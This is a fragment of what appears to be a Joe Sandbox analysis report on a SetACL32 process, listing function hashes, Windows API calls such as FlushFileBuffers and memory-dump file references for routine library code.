                • Opcode ID: 36aef4410844b720566d95c667f48c00615f6f7ef036e21012931fa637b9bf64
                • Instruction ID: 4248073725b59a956e4967bc023000327e6a1b6a75e3ee6cd9a2c93428486d9d
                • Opcode Fuzzy Hash: 36aef4410844b720566d95c667f48c00615f6f7ef036e21012931fa637b9bf64
                • Instruction Fuzzy Hash: 3C11E4B18047409FD730CF68D901787BBE8EF08710F044A2EE889C3740D7B5AA04CBA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00FA0E42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                  • Part of subcall function 00F9FFE3: EnterCriticalSection.KERNEL32(00000000,?,00FA173E,00000000,00FC7438,00000010,00F9ADA2,00000000,?,?,?,?,?,00F9BF70,?), ref: 00F9FFFE
                • FlushFileBuffers.KERNEL32(00000000,00FC7418,0000000C,00FA0F49,00F9ACFF,?,00000001,?,00F9ACFF,?), ref: 00FA0E8B
                • GetLastError.KERNEL32 ref: 00FA0E9C
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: BuffersCriticalEnterErrorFileFlushLastSection
                • String ID: @M)w
                • API String ID: 4109680722-1211491014
                • Opcode ID: 1b45b7b73ef827edd72cbfea2bb4b58f6437659aaa9b7bee54972cd55392b0fb
                • Instruction ID: 54fd1971fe468760aa92fc39140a192ad2b387a9f6f9dc15828a1438ee963528
                • Opcode Fuzzy Hash: 1b45b7b73ef827edd72cbfea2bb4b58f6437659aaa9b7bee54972cd55392b0fb
                • Instruction Fuzzy Hash: A90192B2A003148FDB14AF68ED46A9D7BE8EF4A724F10451AF411DB2A1DB789901AB90
                Uniqueness

                Uniqueness Score: -1.00%